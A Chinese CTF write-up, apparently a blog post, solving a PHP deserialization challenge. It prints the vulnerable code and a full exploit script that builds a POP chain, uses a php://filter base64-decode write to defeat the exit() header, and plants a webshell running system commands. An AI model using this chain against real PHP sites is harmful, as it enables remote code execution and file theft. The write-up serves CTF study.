【青少年CTF S1·2026 公益赛】Serialization

php 复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
class AudiLog {
    public $handler;

    public function __construct() {
        $this->handler = new SystemStatus();
    }

    public function __toString() {
        return $this->handler->process();
    }
}

class FileCache {
    public $filePath;
    public $content;

    public function __construct($path = '', $data = '') {
        $this->filePath = $path;
        $this->content = $data;
    }

    public function process() {
        $security_header = '<?php exit("Access Denied: Protected Cache"); ?>';
        $final_data = $security_header . $this->content;
        file_put_contents($this->filePath, $final_data);
        return "Cache Saved.";
    }
}

class SystemStatus {
    public function process() {
        if(file_exists('./system_config.php')) {
            include('./system_config.php');
        }
        return "System logic normal.";
    }
}

$payload = $_POST['data'];
if(isset($payload)){
    echo unserialize($payload);
}
else{
    echo "Invalid data stream.";
}
?>

从上面的代码中我们查找利用点,可以通过FileCache的process()写入一句话木马

php 复制代码
class FileCache {
    public $filePath;
    public $content;

    public function __construct($path = '', $data = '') {
        $this->filePath = $path;
        $this->content = $data;
    }

    public function process() {
        $security_header = '<?php exit("Access Denied: Protected Cache"); ?>';
        $final_data = $security_header . $this->content;
        file_put_contents($this->filePath, $final_data);
        return "Cache Saved.";
    }
}

但是这里有一个问题是FileCache的process()在写入文件内容的时候,会在文件内容前面添加,让文件没有运行就退出

php 复制代码
<?php exit("Access Denied: Protected Cache"); ?>

因此我们要想办法绕过,我们可以通过base64解码吞字符的形势来躲过

php 复制代码
'<?php exit("Access Denied: Protected Cache"); ?>'

我们命令是

php 复制代码
<?php system("cat /f*");?>
对应的base64编码是
PD9waHAgc3lzdGVtKCJjYXQgL2YqIik7Pz4=

然后我们打开cyberchef来进行组合拼接,让base64能够正常解析

可以看到中间加aaa就可以吞掉exit的代码,然后正常解码我们的命令

那么我们需要做下面的事情

php 复制代码
1、进行字符串的相关操作来出发__toString()魔法函数,原文中echo unserialize($payload);的echo就已经出发了,所以不需要我们管
2、将AudiLog类中的$this->handler替换成FileCache()
3、$this->filePath 赋值为php://filter/write=convert.base64-decode/resource=shell.php
这样就可以先通过base64解码,然后再写入到shell.php
4、$x->handler->content赋值为
'aaa' . base64_encode('<?php system("cat /f*");?>')

那么我们的payload如下

php 复制代码
<?php

class AudiLog {
    public $handler;

    public function __construct() {
        $this->handler = new FileCache();
    }

    public function __toString() {
        return $this->handler->process();
    }
}

class FileCache {
    public $filePath = "php://filter/write=convert.base64-decode/resource=shell.php";
    public $content ;

    # 注意base64_encode函数不能直接赋值给变量,要放到__construct中
    public function __construct() {
        $this->content = 'aaa' . base64_encode('<?php system("cat /f*");?>');
    }

    

}

$exp = new AudiLog();
echo(urlencode(serialize($exp)))


?>

访问得到payload

输入到网站中

成功写入shell.php文件,同时将前面的exit内容吞掉,并写入system命令

相关推荐
ylscode3 小时前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
HackTwoHub10 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .12 小时前
Hackerone-地址栏xss
网络安全·xss
数据知道13 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg66614 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
红信鸽15 小时前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全
数据知道18 小时前
安全实验室搭建指南:一台电脑搭出完整靶场环境
安全·网络安全·电脑
LYFlied1 天前
EVMbench解读:AI Agent如何检测、修复并利用智能合约漏洞
人工智能·网络安全·openai·智能合约·ai agent·evm·智能合约区块链
Hiyajo pray2 天前
属性sdn隐私保护分析
网络安全
Hiyajo pray2 天前
属性sdn的隐私保护策略(1)
网络安全